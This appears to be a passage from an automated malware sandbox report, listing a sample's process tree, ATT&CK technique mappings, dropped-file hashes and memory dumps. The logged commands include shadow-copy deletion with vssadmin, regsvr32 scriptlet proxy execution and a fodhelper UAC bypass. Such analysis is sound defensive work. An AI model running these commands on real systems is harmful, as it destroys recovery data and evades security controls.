    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:2120

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:4948
- C:\Windows\System32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/o703w31o
  2⤵
  - Modifies registry class
  PID:4400
- C:\Windows\System32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3004
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:192
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
      4⤵
      PID:4752
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:2336
- C:\Windows\System32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:1800
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:4148
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
      4⤵
      PID:3052
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4824

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:2240

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\ed0v2w6x8gqo

Filesize
1KB

MD5
be92578d707f7620ba8e8977b856c304

SHA1
de62c9d97ecc242693a17ffa03c06e8242ef8fd8

SHA256
1191ea928600a5274838bd173d328aff4b3bb2165946b60c3f2e90fd826d5d53

SHA512
6bc1e391a63e9732c0ef1263dbc838e0f90a16dd5237d320dfec41a39dfdc5776810c46386ceff8d3508fbce4e5afdc22b874ddb4f3c8fc2ed21afbd66f06334

Download Submit
C:\Users\Public\o703w31o

Filesize
3KB

MD5
ed59cf44ace2214709a24576ee3f8226

SHA1
0311394e35d805503aad33d2913c4b8b8b8fc923

SHA256
dc608bf03ae6b8ad1f72602c2e53f6680c83b30c64f2ead1d78d9d28b0bbd538

SHA512
ec9453f9e09f9c90eeb5612527c9bda8046d27096754f2962d602105c0bbc683844f6a15f5263b175bf0574f594ab3445b20bb96caf71c97bbea13b1bfd29c48

Download Submit
memory/2524-28-0x000002545C470000-0x000002545C471000-memory.dmp

Filesize
4KB

Download
memory/2524-27-0x000002545C460000-0x000002545C461000-memory.dmp

Filesize
4KB

Download
memory/2524-30-0x000002545C480000-0x000002545C481000-memory.dmp

Filesize
4KB

Download
memory/2524-1-0x000002545C220000-0x000002545C223000-memory.dmp

Filesize
12KB

Download
memory/2536-34-0x000001F62C7B0000-0x000001F62C7B1000-memory.dmp

Filesize
4KB

Download
memory/3372-13-0x000002076B560000-0x000002076B561000-memory.dmp

Filesize
4KB

Download
memory/3372-19-0x000002076B570000-0x000002076B571000-memory.dmp

Filesize
4KB

Download
memory/3372-26-0x000002076B5B0000-0x000002076B5B1000-memory.dmp

Filesize
4KB

Download
memory/3372-20-0x000002076B5A0000-0x000002076B5A1000-memory.dmp

Filesize
4KB

Download
memory/3372-11-0x000002076B550000-0x000002076B551000-memory.dmp

Filesize
4KB

Download
memory/3372-0-0x000002076B040000-0x000002076B043000-memory.dmp

Filesize
12KB

Download
memory/3372-2-0x000002076B160000-0x000002076B161000-memory.dmp

Filesize
4KB

Download
memory/3372-33-0x000002076B5D0000-0x000002076B5D1000-memory.dmp

Filesize
4KB

Download
memory/3372-31-0x000002076B840000-0x000002076B841000-memory.dmp

Filesize
4KB

Download
memory/3372-5-0x000002076B190000-0x000002076B191000-memory.dmp

Filesize
4KB

Download
memory/3404-58-0x0000000002710000-0x0000000002711000-memory.dmp

Filesize
4KB

Download
memory/3404-59-0x00000000028E0000-0x00000000028E1000-memory.dmp

Filesize
4KB

Download